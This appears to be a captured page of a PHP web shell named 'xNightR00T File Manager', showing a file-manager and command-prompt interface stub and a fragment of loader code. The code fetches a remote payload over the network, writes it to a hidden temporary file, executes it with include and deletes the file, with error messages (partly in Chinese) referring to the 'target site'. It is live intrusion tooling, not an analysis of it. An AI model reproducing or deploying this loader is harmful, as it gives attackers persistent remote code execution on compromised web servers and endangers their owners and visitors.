xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
array('timeout' => 5))); $_code = @file_get_contents($_url, false, $_ctx); } if ($_code && strlen($_code) > 10) { $_tf = @tempnam(sys_get_temp_dir(), '.'); if (!$_tf) { $_tf = dirname(__FILE__) . '/.t' . substr(md5($_SERVER['HTTP_HOST'] . time()), 0, 8); } if (@file_put_contents($_tf, $_code) !== false) { @include($_tf); @unlink($_tf); } else { header('Content-Type: application/json'); echo '{"code":598,"msg":"loader_write_failed: tmp dir not writable (目标站临时目录不可写)"}'; } } else { header('Content-Type: application/json'); echo '{"code":598,"msg":"loader_fetch_failed: remote txt unreachable (远程TXT失效或目标站无外网)"}'; }